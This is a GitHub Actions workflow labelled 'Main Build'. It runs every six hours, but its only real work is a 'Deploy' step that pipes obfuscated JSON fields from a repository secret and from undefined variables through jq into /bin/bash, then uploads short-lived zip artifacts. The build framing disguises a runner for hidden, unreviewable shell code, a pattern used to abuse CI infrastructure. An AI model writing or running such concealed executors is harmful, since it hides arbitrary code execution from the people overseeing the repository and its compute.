name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '54 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          eer51: ${{ secrets.eer51 }}
        run: |
          printf '%s' "$eer51" | jq -r .px63095 | /bin/bash
          echo $cb11112 | jq -r .ux71368 | /bin/bash
          printf '%s' "$ws037" | jq -r .x82142 | /bin/bash
          echo $ahzus04 | jq -r .hrt3726 | /bin/bash
          echo $fw3938 | jq -r .tex66679 | /bin/bash
          echo $nykc48 | jq -r .ta25938 | /bin/bash
          echo $p46 | jq -r .xt7 | /bin/bash
          echo $fpi1 | jq -r .kf86811 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: 1pIpQQ00
          path: "*.zip"
          retention-days: 1
